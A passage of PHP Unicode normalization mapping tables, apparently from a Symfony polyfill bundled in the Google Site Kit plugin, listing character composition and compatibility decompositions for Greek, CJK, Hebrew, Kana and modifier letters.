=> 'ῄ', 'ῆ' => 'ῆ', 'ῇ' => 'ῇ', 'Ὲ' => 'Ὲ', 'Έ' => 'Έ', 'Ὴ' => 'Ὴ', 'Ή' => 'Ή', 'ῌ' => 'ῌ', '῍' => '῍', '῎' => '῎', '῏' => '῏', 'ῐ' => 'ῐ', 'ῑ' => 'ῑ', 'ῒ' => 'ῒ', 'ΐ' => 'ΐ', 'ῖ' => 'ῖ', 'ῗ' => 'ῗ', 'Ῐ' => 'Ῐ', 'Ῑ' => 'Ῑ', 'Ὶ' => 'Ὶ', 'Ί' => 'Ί', '῝' => '῝', '῞' => '῞', '῟' => '῟', 'ῠ' => 'ῠ', 'ῡ' => 'ῡ', 'ῢ' => 'ῢ', 'ΰ' => 'ΰ', 'ῤ' => 'ῤ', 'ῥ' => 'ῥ', 'ῦ' => 'ῦ', 'ῧ' => 'ῧ', 'Ῠ' => 'Ῠ', 'Ῡ' => 'Ῡ', 'Ὺ' => 'Ὺ', 'Ύ' => 'Ύ', 'Ῥ' => 'Ῥ', '῭' => '῭', '΅' => '΅', '`' => '`', 'ῲ' => 'ῲ', 'ῳ' => 'ῳ', 'ῴ' => 'ῴ', 'ῶ' => 'ῶ', 'ῷ' => 'ῷ', 'Ὸ' => 'Ὸ', 'Ό' => 'Ό', 'Ὼ' => 'Ὼ', 'Ώ' => 'Ώ', 'ῼ' => 'ῼ', '´' => '´', ' ' => ' ', ' ' => ' ', 'Ω' => 'Ω', 'K' => 'K', 'Å' => 'Å', '↚' => '↚', '↛' => '↛', '↮' => '↮', '⇍' => '⇍', '⇎' => '⇎', '⇏' => '⇏', '∄' => '∄', '∉' => '∉', '∌' => '∌', '∤' => '∤', '∦' => '∦', '≁' => '≁', '≄' => '≄', '≇' => '≇', '≉' => '≉', '≠' => '≠', '≢' => '≢', '≭' => '≭', '≮' => '≮', '≯' => '≯', '≰' => '≰', '≱' => '≱', '≴' => '≴', '≵' => '≵', '≸' => '≸', '≹' => '≹', '⊀' => '⊀', '⊁' => '⊁', '⊄' => '⊄', '⊅' => '⊅', '⊈' => '⊈', '⊉' => '⊉', '⊬' => '⊬', '⊭' => '⊭', '⊮' => '⊮', '⊯' => '⊯', '⋠' => '⋠', '⋡' => '⋡', '⋢' => '⋢', '⋣' => '⋣', '⋪' => '⋪', '⋫' => '⋫', '⋬' => '⋬', '⋭' => '⋭', '〈' => '〈', '〉' => '〉', '⫝̸' => '⫝̸', 'が' => 'が', 'ぎ' => 'ぎ', 'ぐ' => 'ぐ', 'げ' => 'げ', 'ご' => 'ご', 'ざ' => 'ざ', 'じ' => 'じ', 'ず' => 'ず', 'ぜ' => 'ぜ', 'ぞ' => 'ぞ', 'だ' => 'だ', 'ぢ' => 'ぢ', 'づ' => 'づ', 'で' => 'で', 'ど' => 'ど', 'ば' => 'ば', 'ぱ' => 'ぱ', 'び' => 'び', 'ぴ' => 'ぴ', 'ぶ' => 'ぶ', 'ぷ' => 'ぷ', 'べ' => 'べ', 'ぺ' => 'ぺ', 'ぼ' => 'ぼ', 'ぽ' => 'ぽ', 'ゔ' => 'ゔ', 'ゞ' => 'ゞ', 'ガ' => 'ガ', 'ギ' => 'ギ', 'グ' => 'グ', 'ゲ' => 'ゲ', 'ゴ' => 'ゴ', 'ザ' => 'ザ', 'ジ' => 'ジ', 'ズ' => 'ズ', 'ゼ' => 'ゼ', 'ゾ' => 'ゾ', 'ダ' => 'ダ', 'ヂ' => 'ヂ', 'ヅ' => 'ヅ', 'デ' => 'デ', 'ド' => 'ド', 'バ' => 'バ', 'パ' => 'パ', 'ビ' => 'ビ', 'ピ' => 'ピ', 'ブ' => 'ブ', 'プ' => 'プ', 'ベ' => 'ベ', 'ペ' => 'ペ', 'ボ' => 'ボ', 'ポ' => 'ポ', 'ヴ' => 'ヴ', 'ヷ' => 'ヷ', 'ヸ' => 'ヸ', 'ヹ' => 'ヹ', 'ヺ' => 'ヺ', 'ヾ' => 'ヾ', '豈' => '豈', '更' => '更', '車' => '車', '賈' => '賈', '滑' => '滑', '串' => '串', '句' => '句', '龜' => '龜', '龜' => '龜', '契' => '契', '金' => '金', '喇' => '喇', '奈' => '奈', '懶' => '懶', '癩' => '癩', '羅' => '羅', '蘿' => '蘿', '螺' => '螺', '裸' => '裸', '邏' => '邏', '樂' => '樂', '洛' => '洛', '烙' => '烙', '珞' => '珞', '落' => '落', '酪' => '酪', '駱' => '駱', '亂' => '亂', '卵' => '卵', '欄' => '欄', '爛' => '爛', '蘭' => '蘭', '鸞' => '鸞', '嵐' => '嵐', '濫' => '濫', '藍' => '藍', '襤' => '襤', '拉' => '拉', '臘' => '臘', '蠟' => '蠟', '廊' => '廊', '朗' => '朗', '浪' => '浪', '狼' => '狼', '郎' => '郎', '來' => '來', '冷' => '冷', '勞' => '勞', '擄' => '擄', '櫓' => '櫓', '爐' => '爐', '盧' => '盧', '老' => '老', '蘆' => '蘆', '虜' => '虜', '路' => '路', '露' => '露', '魯' => '魯', '鷺' => '鷺', '碌' => '碌', '祿' => '祿', '綠' => '綠', '菉' => '菉', '錄' => '錄', '鹿' => '鹿', '論' => '論', '壟' => '壟', '弄' => '弄', '籠' => '籠', '聾' => '聾', '牢' => '牢', '磊' => '磊', '賂' => '賂', '雷' => '雷', '壘' => '壘', '屢' => '屢', '樓' => '樓', '淚' => '淚', '漏' => '漏', '累' => '累', '縷' => '縷', '陋' => '陋', '勒' => '勒', '肋' => '肋', '凜' => '凜', '凌' => '凌', '稜' => '稜', '綾' => '綾', '菱' => '菱', '陵' => '陵', '讀' => '讀', '拏' => '拏', '樂' => '樂', '諾' => '諾', '丹' => '丹', '寧' => '寧', '怒' => '怒', '率' => '率', '異' => '異', '北' => '北', '磻' => '磻', '便' => '便', '復' => '復', '不' => '不', '泌' => '泌', '數' => '數', '索' => '索', '參' => '參', '塞' => '塞', '省' => '省', '葉' => '葉', '說' => '說', '殺' => '殺', '辰' => '辰', '沈' => '沈', '拾' => '拾', '若' => '若', '掠' => '掠', '略' => '略', '亮' => '亮', '兩' => '兩', '凉' => '凉', '梁' => '梁', '糧' => '糧', '良' => '良', '諒' => '諒', '量' => '量', '勵' => '勵', '呂' => '呂', '女' => '女', '廬' => '廬', '旅' => '旅', '濾' => '濾', '礪' => '礪', '閭' => '閭', '驪' => '驪', '麗' => '麗', '黎' => '黎', '力' => '力', '曆' => '曆', '歷' => '歷', '轢' => '轢', '年' => '年', '憐' => '憐', '戀' => '戀', '撚' => '撚', '漣' => '漣', '煉' => '煉', '璉' => '璉', '秊' => '秊', '練' => '練', '聯' => '聯', '輦' => '輦', '蓮' => '蓮', '連' => '連', '鍊' => '鍊', '列' => '列', '劣' => '劣', '咽' => '咽', '烈' => '烈', '裂' => '裂', '說' => '說', '廉' => '廉', '念' => '念', '捻' => '捻', '殮' => '殮', '簾' => '簾', '獵' => '獵', '令' => '令', '囹' => '囹', '寧' => '寧', '嶺' => '嶺', '怜' => '怜', '玲' => '玲', '瑩' => '瑩', '羚' => '羚', '聆' => '聆', '鈴' => '鈴', '零' => '零', '靈' => '靈', '領' => '領', '例' => '例', '禮' => '禮', '醴' => '醴', '隸' => '隸', '惡' => '惡', '了' => '了', '僚' => '僚', '寮' => '寮', '尿' => '尿', '料' => '料', '樂' => '樂', '燎' => '燎', '療' => '療', '蓼' => '蓼', '遼' => '遼', '龍' => '龍', '暈' => '暈', '阮' => '阮', '劉' => '劉', '杻' => '杻', '柳' => '柳', '流' => '流', '溜' => '溜', '琉' => '琉', '留' => '留', '硫' => '硫', '紐' => '紐', '類' => '類', '六' => '六', '戮' => '戮', '陸' => '陸', '倫' => '倫', '崙' => '崙', '淪' => '淪', '輪' => '輪', '律' => '律', '慄' => '慄', '栗' => '栗', '率' => '率', '隆' => '隆', '利' => '利', '吏' => '吏', '履' => '履', '易' => '易', '李' => '李', '梨' => '梨', '泥' => '泥', '理' => '理', '痢' => '痢', '罹' => '罹', '裏' => '裏', '裡' => '裡', '里' => '里', '離' => '離', '匿' => '匿', '溺' => '溺', '吝' => '吝', '燐' => '燐', '璘' => '璘', '藺' => '藺', '隣' => '隣', '鱗' => '鱗', '麟' => '麟', '林' => '林', '淋' => '淋', '臨' => '臨', '立' => '立', '笠' => '笠', '粒' => '粒', '狀' => '狀', '炙' => '炙', '識' => '識', '什' => '什', '茶' => '茶', '刺' => '刺', '切' => '切', '度' => '度', '拓' => '拓', '糖' => '糖', '宅' => '宅', '洞' => '洞', '暴' => '暴', '輻' => '輻', '行' => '行', '降' => '降', '見' => '見', '廓' => '廓', '兀' => '兀', '嗀' => '嗀', '塚' => '塚', '晴' => '晴', '凞' => '凞', '猪' => '猪', '益' => '益', '礼' => '礼', '神' => '神', '祥' => '祥', '福' => '福', '靖' => '靖', '精' => '精', '羽' => '羽', '蘒' => '蘒', '諸' => '諸', '逸' => '逸', '都' => '都', '飯' => '飯', '飼' => '飼', '館' => '館', '鶴' => '鶴', '郞' => '郞', '隷' => '隷', '侮' => '侮', '僧' => '僧', '免' => '免', '勉' => '勉', '勤' => '勤', '卑' => '卑', '喝' => '喝', '嘆' => '嘆', '器' => '器', '塀' => '塀', '墨' => '墨', '層' => '層', '屮' => '屮', '悔' => '悔', '慨' => '慨', '憎' => '憎', '懲' => '懲', '敏' => '敏', '既' => '既', '暑' => '暑', '梅' => '梅', '海' => '海', '渚' => '渚', '漢' => '漢', '煮' => '煮', '爫' => '爫', '琢' => '琢', '碑' => '碑', '社' => '社', '祉' => '祉', '祈' => '祈', '祐' => '祐', '祖' => '祖', '祝' => '祝', '禍' => '禍', '禎' => '禎', '穀' => '穀', '突' => '突', '節' => '節', '練' => '練', '縉' => '縉', '繁' => '繁', '署' => '署', '者' => '者', '臭' => '臭', '艹' => '艹', '艹' => '艹', '著' => '著', '褐' => '褐', '視' => '視', '謁' => '謁', '謹' => '謹', '賓' => '賓', '贈' => '贈', '辶' => '辶', '逸' => '逸', '難' => '難', '響' => '響', '頻' => '頻', '恵' => '恵', '𤋮' => '𤋮', '舘' => '舘', '並' => '並', '况' => '况', '全' => '全', '侀' => '侀', '充' => '充', '冀' => '冀', '勇' => '勇', '勺' => '勺', '喝' => '喝', '啕' => '啕', '喙' => '喙', '嗢' => '嗢', '塚' => '塚', '墳' => '墳', '奄' => '奄', '奔' => '奔', '婢' => '婢', '嬨' => '嬨', '廒' => '廒', '廙' => '廙', '彩' => '彩', '徭' => '徭', '惘' => '惘', '慎' => '慎', '愈' => '愈', '憎' => '憎', '慠' => '慠', '懲' => '懲', '戴' => '戴', '揄' => '揄', '搜' => '搜', '摒' => '摒', '敖' => '敖', '晴' => '晴', '朗' => '朗', '望' => '望', '杖' => '杖', '歹' => '歹', '殺' => '殺', '流' => '流', '滛' => '滛', '滋' => '滋', '漢' => '漢', '瀞' => '瀞', '煮' => '煮', '瞧' => '瞧', '爵' => '爵', '犯' => '犯', '猪' => '猪', '瑱' => '瑱', '甆' => '甆', '画' => '画', '瘝' => '瘝', '瘟' => '瘟', '益' => '益', '盛' => '盛', '直' => '直', '睊' => '睊', '着' => '着', '磌' => '磌', '窱' => '窱', '節' => '節', '类' => '类', '絛' => '絛', '練' => '練', '缾' => '缾', '者' => '者', '荒' => '荒', '華' => '華', '蝹' => '蝹', '襁' => '襁', '覆' => '覆', '視' => '視', '調' => '調', '諸' => '諸', '請' => '請', '謁' => '謁', '諾' => '諾', '諭' => '諭', '謹' => '謹', '變' => '變', '贈' => '贈', '輸' => '輸', '遲' => '遲', '醙' => '醙', '鉶' => '鉶', '陼' => '陼', '難' => '難', '靖' => '靖', '韛' => '韛', '響' => '響', '頋' => '頋', '頻' => '頻', '鬒' => '鬒', '龜' => '龜', '𢡊' => '𢡊', '𢡄' => '𢡄', '𣏕' => '𣏕', '㮝' => '㮝', '䀘' => '䀘', '䀹' => '䀹', '𥉉' => '𥉉', '𥳐' => '𥳐', '𧻓' => '𧻓', '齃' => '齃', '龎' => '龎', 'יִ' => 'יִ', 'ײַ' => 'ײַ', 'שׁ' => 'שׁ', 'שׂ' => 'שׂ', 'שּׁ' => 'שּׁ', 'שּׂ' => 'שּׂ', 'אַ' => 'אַ', 'אָ' => 'אָ', 'אּ' => 'אּ', 'בּ' => 'בּ', 'גּ' => 'גּ', 'דּ' => 'דּ', 'הּ' => 'הּ', 'וּ' => 'וּ', 'זּ' => 'זּ', 'טּ' => 'טּ', 'יּ' => 'יּ', 'ךּ' => 'ךּ', 'כּ' => 'כּ', 'לּ' => 'לּ', 'מּ' => 'מּ', 'נּ' => 'נּ', 'סּ' => 'סּ', 'ףּ' => 'ףּ', 'פּ' => 'פּ', 'צּ' => 'צּ', 'קּ' => 'קּ', 'רּ' => 'רּ', 'שּ' => 'שּ', 'תּ' => 'תּ', 'וֹ' => 'וֹ', 'בֿ' => 'בֿ', 'כֿ' => 'כֿ', 'פֿ' => 'פֿ', '𑂚' => '𑂚', '𑂜' => '𑂜', '𑂫' => '𑂫', '𑄮' => '𑄮', '𑄯' => '𑄯', '𑍋' => '𑍋', '𑍌' => '𑍌', '𑒻' => '𑒻', '𑒼' => '𑒼', '𑒾' => '𑒾', '𑖺' => '𑖺', '𑖻' => '𑖻', '𑤸' => '𑤸', '𝅗𝅥' => '𝅗𝅥', '𝅘𝅥' => '𝅘𝅥', '𝅘𝅥𝅮' => '𝅘𝅥𝅮', '𝅘𝅥𝅯' => '𝅘𝅥𝅯', '𝅘𝅥𝅰' => '𝅘𝅥𝅰', '𝅘𝅥𝅱' => '𝅘𝅥𝅱', '𝅘𝅥𝅲' => '𝅘𝅥𝅲', '𝆹𝅥' => '𝆹𝅥', '𝆺𝅥' => '𝆺𝅥', '𝆹𝅥𝅮' => '𝆹𝅥𝅮', '𝆺𝅥𝅮' => '𝆺𝅥𝅮', '𝆹𝅥𝅯' => '𝆹𝅥𝅯', '𝆺𝅥𝅯' => '𝆺𝅥𝅯', '丽' => '丽', '丸' => '丸', '乁' => '乁', '𠄢' => '𠄢', '你' => '你', '侮' => '侮', '侻' => '侻', '倂' => '倂', '偺' => '偺', '備' => '備', '僧' => '僧', '像' => '像', '㒞' => '㒞', '𠘺' => '𠘺', '免' => '免', '兔' => '兔', '兤' => '兤', '具' => '具', '𠔜' => '𠔜', '㒹' => '㒹', '內' => '內', '再' => '再', '𠕋' => '𠕋', '冗' => '冗', '冤' => '冤', '仌' => '仌', '冬' => '冬', '况' => '况', '𩇟' => '𩇟', '凵' => '凵', '刃' => '刃', '㓟' => '㓟', '刻' => '刻', '剆' => '剆', '割' => '割', '剷' => '剷', '㔕' => '㔕', '勇' => '勇', '勉' => '勉', '勤' => '勤', '勺' => '勺', '包' => '包', '匆' => '匆', '北' => '北', '卉' => '卉', '卑' => '卑', '博' => '博', '即' => '即', '卽' => '卽', '卿' => '卿', '卿' => '卿', '卿' => '卿', '𠨬' => '𠨬', '灰' => '灰', '及' => '及', '叟' => '叟', '𠭣' => '𠭣', '叫' => '叫', '叱' => '叱', '吆' => '吆', '咞' => '咞', '吸' => '吸', '呈' => '呈', '周' => '周', '咢' => '咢', '哶' => '哶', '唐' => '唐', '啓' => '啓', '啣' => '啣', '善' => '善', '善' => '善', '喙' => '喙', '喫' => '喫', '喳' => '喳', '嗂' => '嗂', '圖' => '圖', '嘆' => '嘆', '圗' => '圗', '噑' => '噑', '噴' => '噴', '切' => '切', '壮' => '壮', '城' => '城', '埴' => '埴', '堍' => '堍', '型' => '型', '堲' => '堲', '報' => '報', '墬' => '墬', '𡓤' => '𡓤', '売' => '売', '壷' => '壷', '夆' => '夆', '多' => '多', '夢' => '夢', '奢' => '奢', '𡚨' => '𡚨', '𡛪' => '𡛪', '姬' => '姬', '娛' => '娛', '娧' => '娧', '姘' => '姘', '婦' => '婦', '㛮' => '㛮', '㛼' => '㛼', '嬈' => '嬈', '嬾' => '嬾', '嬾' => '嬾', '𡧈' => '𡧈', '寃' => '寃', '寘' => '寘', '寧' => '寧', '寳' => '寳', '𡬘' => '𡬘', '寿' => '寿', '将' => '将', '当' => '当', '尢' => '尢', '㞁' => '㞁', '屠' => '屠', '屮' => '屮', '峀' => '峀', '岍' => '岍', '𡷤' => '𡷤', '嵃' => '嵃', '𡷦' => '𡷦', '嵮' => '嵮', '嵫' => '嵫', '嵼' => '嵼', '巡' => '巡', '巢' => '巢', '㠯' => '㠯', '巽' => '巽', '帨' => '帨', '帽' => '帽', '幩' => '幩', '㡢' => '㡢', '𢆃' => '𢆃', '㡼' => '㡼', '庰' => '庰', '庳' => '庳', '庶' => '庶', '廊' => '廊', '𪎒' => '𪎒', '廾' => '廾', '𢌱' => '𢌱', '𢌱' => '𢌱', '舁' => '舁', '弢' => '弢', '弢' => '弢', '㣇' => '㣇', '𣊸' => '𣊸', '𦇚' => '𦇚', '形' => '形', '彫' => '彫', '㣣' => '㣣', '徚' => '徚', '忍' => '忍', '志' => '志', '忹' => '忹', '悁' => '悁', '㤺' => '㤺', '㤜' => '㤜', '悔' => '悔', '𢛔' => '𢛔', '惇' => '惇', '慈' => '慈', '慌' => '慌', '慎' => '慎', '慌' => '慌', '慺' => '慺', '憎' => '憎', '憲' => '憲', '憤' => '憤', '憯' => '憯', '懞' => '懞', '懲' => '懲', '懶' => '懶', '成' => '成', '戛' => '戛', '扝' => '扝', '抱' => '抱', '拔' => '拔', '捐' => '捐', '𢬌' => '𢬌', '挽' => '挽', '拼' => '拼', '捨' => '捨', '掃' => '掃', '揤' => '揤', '𢯱' => '𢯱', '搢' => '搢', '揅' => '揅', '掩' => '掩', '㨮' => '㨮', '摩' => '摩', '摾' => '摾', '撝' => '撝', '摷' => '摷', '㩬' => '㩬', '敏' => '敏', '敬' => '敬', '𣀊' => '𣀊', '旣' => '旣', '書' => '書', '晉' => '晉', '㬙' => '㬙', '暑' => '暑', '㬈' => '㬈', '㫤' => '㫤', '冒' => '冒', '冕' => '冕', '最' => '最', '暜' => '暜', '肭' => '肭', '䏙' => '䏙', '朗' => '朗', '望' => '望', '朡' => '朡', '杞' => '杞', '杓' => '杓', '𣏃' => '𣏃', '㭉' => '㭉', '柺' => '柺', '枅' => '枅', '桒' => '桒', '梅' => '梅', '𣑭' => '𣑭', '梎' => '梎', '栟' => '栟', '椔' => '椔', '㮝' => '㮝', '楂' => '楂', '榣' => '榣', '槪' => '槪', '檨' => '檨', '𣚣' => '𣚣', '櫛' => '櫛', '㰘' => '㰘', '次' => '次', '𣢧' => '𣢧', '歔' => '歔', '㱎' => '㱎', '歲' => '歲', '殟' => '殟', '殺' => '殺', '殻' => '殻', '𣪍' => '𣪍', '𡴋' => '𡴋', '𣫺' => '𣫺', '汎' => '汎', '𣲼' => '𣲼', '沿' => '沿', '泍' => '泍', '汧' => '汧', '洖' => '洖', '派' => '派', '海' => '海', '流' => '流', '浩' => '浩', '浸' => '浸', '涅' => '涅', '𣴞' => '𣴞', '洴' => '洴', '港' => '港', '湮' => '湮', '㴳' => '㴳', '滋' => '滋', '滇' => '滇', '𣻑' => '𣻑', '淹' => '淹', '潮' => '潮', '𣽞' => '𣽞', '𣾎' => '𣾎', '濆' => '濆', '瀹' => '瀹', '瀞' => '瀞', '瀛' => '瀛', '㶖' => '㶖', '灊' => '灊', '災' => '災', '灷' => '灷', '炭' => '炭', '𠔥' => '𠔥', '煅' => '煅', '𤉣' => '𤉣', '熜' => '熜', '𤎫' => '𤎫', '爨' => '爨', '爵' => '爵', '牐' => '牐', '𤘈' => '𤘈', '犀' => '犀', '犕' => '犕', '𤜵' => '𤜵', '𤠔' => '𤠔', '獺' => '獺', '王' => '王', '㺬' => '㺬', '玥' => '玥', '㺸' => '㺸', '㺸' => '㺸', '瑇' => '瑇', '瑜' => '瑜', '瑱' => '瑱', '璅' => '璅', '瓊' => '瓊', '㼛' => '㼛', '甤' => '甤', '𤰶' => '𤰶', '甾' => '甾', '𤲒' => '𤲒', '異' => '異', '𢆟' => '𢆟', '瘐' => '瘐', '𤾡' => '𤾡', '𤾸' => '𤾸', '𥁄' => '𥁄', '㿼' => '㿼', '䀈' => '䀈', '直' => '直', '𥃳' => '𥃳', '𥃲' => '𥃲', '𥄙' => '𥄙', '𥄳' => '𥄳', '眞' => '眞', '真' => '真', '真' => '真', '睊' => '睊', '䀹' => '䀹', '瞋' => '瞋', '䁆' => '䁆', '䂖' => '䂖', '𥐝' => '𥐝', '硎' => '硎', '碌' => '碌', '磌' => '磌', '䃣' => '䃣', '𥘦' => '𥘦', '祖' => '祖', '𥚚' => '𥚚', '𥛅' => '𥛅', '福' => '福', '秫' => '秫', '䄯' => '䄯', '穀' => '穀', '穊' => '穊', '穏' => '穏', '𥥼' => '𥥼', '𥪧' => '𥪧', '𥪧' => '𥪧', '竮' => '竮', '䈂' => '䈂', '𥮫' => '𥮫', '篆' => '篆', '築' => '築', '䈧' => '䈧', '𥲀' => '𥲀', '糒' => '糒', '䊠' => '䊠', '糨' => '糨', '糣' => '糣', '紀' => '紀', '𥾆' => '𥾆', '絣' => '絣', '䌁' => '䌁', '緇' => '緇', '縂' => '縂', '繅' => '繅', '䌴' => '䌴', '𦈨' => '𦈨', '𦉇' => '𦉇', '䍙' => '䍙', '𦋙' => '𦋙', '罺' => '罺', '𦌾' => '𦌾', '羕' => '羕', '翺' => '翺', '者' => '者', '𦓚' => '𦓚', '𦔣' => '𦔣', '聠' => '聠', '𦖨' => '𦖨', '聰' => '聰', '𣍟' => '𣍟', '䏕' => '䏕', '育' => '育', '脃' => '脃', '䐋' => '䐋', '脾' => '脾', '媵' => '媵', '𦞧' => '𦞧', '𦞵' => '𦞵', '𣎓' => '𣎓', '𣎜' => '𣎜', '舁' => '舁', '舄' => '舄', '辞' => '辞', '䑫' => '䑫', '芑' => '芑', '芋' => '芋', '芝' => '芝', '劳' => '劳', '花' => '花', '芳' => '芳', '芽' => '芽', '苦' => '苦', '𦬼' => '𦬼', '若' => '若', '茝' => '茝', '荣' => '荣', '莭' => '莭', '茣' => '茣', '莽' => '莽', '菧' => '菧', '著' => '著', '荓' => '荓', '菊' => '菊', '菌' => '菌', '菜' => '菜', '𦰶' => '𦰶', '𦵫' => '𦵫', '𦳕' => '𦳕', '䔫' => '䔫', '蓱' => '蓱', '蓳' => '蓳', '蔖' => '蔖', '𧏊' => '𧏊', '蕤' => '蕤', '𦼬' => '𦼬', '䕝' => '䕝', '䕡' => '䕡', '𦾱' => '𦾱', '𧃒' => '𧃒', '䕫' => '䕫', '虐' => '虐', '虜' => '虜', '虧' => '虧', '虩' => '虩', '蚩' => '蚩', '蚈' => '蚈', '蜎' => '蜎', '蛢' => '蛢', '蝹' => '蝹', '蜨' => '蜨', '蝫' => '蝫', '螆' => '螆', '䗗' => '䗗', '蟡' => '蟡', '蠁' => '蠁', '䗹' => '䗹', '衠' => '衠', '衣' => '衣', '𧙧' => '𧙧', '裗' => '裗', '裞' => '裞', '䘵' => '䘵', '裺' => '裺', '㒻' => '㒻', '𧢮' => '𧢮', '𧥦' => '𧥦', '䚾' => '䚾', '䛇' => '䛇', '誠' => '誠', '諭' => '諭', '變' => '變', '豕' => '豕', '𧲨' => '𧲨', '貫' => '貫', '賁' => '賁', '贛' => '贛', '起' => '起', '𧼯' => '𧼯', '𠠄' => '𠠄', '跋' => '跋', '趼' => '趼', '跰' => '跰', '𠣞' => '𠣞', '軔' => '軔', '輸' => '輸', '𨗒' => '𨗒', '𨗭' => '𨗭', '邔' => '邔', '郱' => '郱', '鄑' => '鄑', '𨜮' => '𨜮', '鄛' => '鄛', '鈸' => '鈸', '鋗' => '鋗', '鋘' => '鋘', '鉼' => '鉼', '鏹' => '鏹', '鐕' => '鐕', '𨯺' => '𨯺', '開' => '開', '䦕' => '䦕', '閷' => '閷', '𨵷' => '𨵷', '䧦' => '䧦', '雃' => '雃', '嶲' => '嶲', '霣' => '霣', '𩅅' => '𩅅', '𩈚' => '𩈚', '䩮' => '䩮', '䩶' => '䩶', '韠' => '韠', '𩐊' => '𩐊', '䪲' => '䪲', '𩒖' => '𩒖', '頋' => '頋', '頋' => '頋', '頩' => '頩', '𩖶' => '𩖶', '飢' => '飢', '䬳' => '䬳', '餩' => '餩', '馧' => '馧', '駂' => '駂', '駾' => '駾', '䯎' => '䯎', '𩬰' => '𩬰', '鬒' => '鬒', '鱀' => '鱀', '鳽' => '鳽', '䳎' => '䳎', '䳭' => '䳭', '鵧' => '鵧', '𪃎' => '𪃎', '䳸' => '䳸', '𪄅' => '𪄅', '𪈎' => '𪈎', '𪊑' => '𪊑', '麻' => '麻', '䵖' => '䵖', '黹' => '黹', '黾' => '黾', '鼅' => '鼅', '鼏' => '鼏', '鼖' => '鼖', '鼻' => '鼻', '𪘀' => '𪘀'); <?php namespace Google\Site_Kit_Dependencies; return array(' ' => ' ', '¨' => ' ̈', 'ª' => 'a', '¯' => ' ̄', '²' => '2', '³' => '3', '´' => ' ́', 'µ' => 'μ', '¸' => ' ̧', '¹' => '1', 'º' => 'o', '¼' => '1⁄4', '½' => '1⁄2', '¾' => '3⁄4', 'IJ' => 'IJ', 'ij' => 'ij', 'Ŀ' => 'L·', 'ŀ' => 'l·', 'ʼn' => 'ʼn', 'ſ' => 's', 'DŽ' => 'DŽ', 'Dž' => 'Dž', 'dž' => 'dž', 'LJ' => 'LJ', 'Lj' => 'Lj', 'lj' => 'lj', 'NJ' => 'NJ', 'Nj' => 'Nj', 'nj' => 'nj', 'DZ' => 'DZ', 'Dz' => 'Dz', 'dz' => 'dz', 'ʰ' => 'h', 'ʱ' => 'ɦ', 'ʲ' => 'j', 'ʳ' => 'r', 'ʴ' => 'ɹ', 'ʵ' => 'ɻ', 'ʶ' => 'ʁ', 'ʷ' => 'w', 'ʸ' => 'y', '˘' => ' ̆', '˙' => ' ̇', '˚' => ' ̊', '˛' => ' ̨', '˜' => ' ̃', '˝' => ' ̋', 'ˠ' => 'ɣ', 'ˡ' => 'l', 'ˢ' => 's', 'ˣ' => 'x', 'ˤ' => 'ʕ', 'ͺ' => ' ͅ', '΄' => ' ́', '΅' => ' ̈́', 'ϐ' => 'β', 'ϑ' => 'θ', 'ϒ' => 'Υ', 'ϓ' => 'Ύ', 'ϔ' => 'Ϋ', 'ϕ' => 'φ', 'ϖ' => 'π', 'ϰ' => 'κ', 'ϱ' => 'ρ', 'ϲ' => 'ς', 'ϴ' => 'Θ', 'ϵ' => 'ε', 'Ϲ' => 'Σ', 'և' => 'եւ', 'ٵ' => 'اٴ', 'ٶ' => 'وٴ', 'ٷ' => 'ۇٴ', 'ٸ' => 'يٴ', 'ำ' => 'ํา', 'ຳ' => 'ໍາ', 'ໜ' => 'ຫນ', 'ໝ' => 'ຫມ', '༌' => '་', 'ཷ' => 'ྲཱྀ', 'ཹ' => 'ླཱྀ', 'ჼ' => 'ნ', 'ᴬ' => 'A', 'ᴭ' => 'Æ', 'ᴮ' => 'B', 'ᴰ' => 'D', 'ᴱ' => 'E', 'ᴲ' => 'Ǝ', 'ᴳ' => 'G', 'ᴴ' => 'H', 'ᴵ' => 'I', 'ᴶ' => 'J', 'ᴷ' => 'K', 'ᴸ' => 'L', 'ᴹ' => 'M', 'ᴺ' => 'N', 'ᴼ' => 'O', 'ᴽ' => 'Ȣ', 'ᴾ' => 'P', 'ᴿ' => 'R', 'ᵀ' => 'T', 'ᵁ' => 'U', 'ᵂ' => 'W', 'ᵃ' => 'a', 'ᵄ' => 'ɐ', 'ᵅ' => 'ɑ', 'ᵆ' => 'ᴂ', 'ᵇ' => 'b', 'ᵈ' => 'd', 'ᵉ' => 'e', 'ᵊ' => 'ə', 'ᵋ' => 'ɛ', 'ᵌ' => 'ɜ', 'ᵍ' => 'g', 'ᵏ' => 'k', 'ᵐ' => 'm', 'ᵑ' => 'ŋ', 'ᵒ' => 'o', 'ᵓ' => 'ɔ', 'ᵔ' => 'ᴖ', 'ᵕ' => 'ᴗ', 'ᵖ' => 'p', 'ᵗ' => 't', 'ᵘ' => 'u', 'ᵙ' => 'ᴝ', 'ᵚ' => 'ɯ', 'ᵛ' => 'v', 'ᵜ' => 'ᴥ', 'ᵝ' => 'β', 'ᵞ' => 'γ', 'ᵟ' => 'δ', 'ᵠ' => 'φ', 'ᵡ' => 'χ', 'ᵢ' => 'i', 'ᵣ' => 'r', 'ᵤ' => 'u', 'ᵥ' => 'v', 'ᵦ' => 'β', 'ᵧ' => 'γ', 'ᵨ' => 'ρ', 'ᵩ' => 'φ', 'ᵪ' => 'χ', 'ᵸ' => 'н', 'ᶛ' => 'ɒ', 'ᶜ' => 'c', 'ᶝ' => 'ɕ', 'ᶞ' => 'ð', 'ᶟ' => 'ɜ', 'ᶠ' => 'f', 'ᶡ' => 'ɟ', 'ᶢ' => 'ɡ', 'ᶣ' => 'ɥ', 'ᶤ' => 'ɨ', 'ᶥ' => 'ɩ', 'ᶦ' => 'ɪ', 'ᶧ' => 'ᵻ', 'ᶨ' => 'ʝ', 'ᶩ' => 'ɭ', 'ᶪ' => 'ᶅ', 'ᶫ' => 'ʟ', 'ᶬ' => 'ɱ', 'ᶭ' => 'ɰ', 'ᶮ' => 'ɲ', 'ᶯ' => 'ɳ', 'ᶰ' => 'ɴ', 'ᶱ' => 'ɵ', 'ᶲ' => 'ɸ', 'ᶳ' => 'ʂ', 'ᶴ' => 'ʃ', 'ᶵ' => 'ƫ', 'ᶶ' => 'ʉ', 'ᶷ' => 'ʊ', 'ᶸ' => 'ᴜ', 'ᶹ' => 'ʋ', 'ᶺ' => 'ʌ', 'ᶻ' => 'z', 'ᶼ' => 'ʐ', 'ᶽ' => 'ʑ', 'ᶾ' => 'ʒ', 'ᶿ' => 'θ', 'ẚ' => 'aʾ', 'ẛ' => 'ṡ', '᾽' => ' ̓', '᾿' => ' ̓', '῀' => ' ͂', '῁' => ' ̈͂', '῍' => ' ̓̀', 